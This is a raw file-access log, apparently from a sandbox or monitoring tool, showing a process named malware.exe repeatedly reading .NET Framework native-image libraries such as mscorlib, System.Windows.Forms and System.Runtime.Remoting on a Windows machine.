29/2/2020 - 1:45:53.168Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.215Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.262Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.356Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.403Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.450Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.497Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.543Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.590Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.637Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.684Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.731Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:53.778Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.825Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.872Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:53.965Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.12Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.59Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.106Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.153Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.200Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.247Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:54.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:54.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:54.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:55.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:55.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:55.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:55.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:55.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:55.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.75Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.122Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.168Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.215Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:56.262Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:45:56.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.356Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.403Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.450Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.497Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:56.543Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.590Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:56.637Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:56.684Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:56.731Open1480C:\malware.exeC:\Windows\Globalization\pt-br.nlp
29/2/2020 - 1:45:56.731Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:56.778Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:56.872Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.918Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:56.965Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:45:57.12Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.59Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.106Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.153Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.200Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.247Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:57.293Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.387Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.387Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.715Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Runtime.Remoting\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:57.856Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\System.Runtime.Remoting\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:57.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:57.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:58.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.512Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:58.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:58.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:58.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.106Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.153Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.200Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.247Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:59.387Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.434Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\77248929224228e8150eea45de075401\System.Runtime.Remoting.ni.dllSystem.Runtime.Remoting.ni.dll
29/2/2020 - 1:45:59.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:59.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
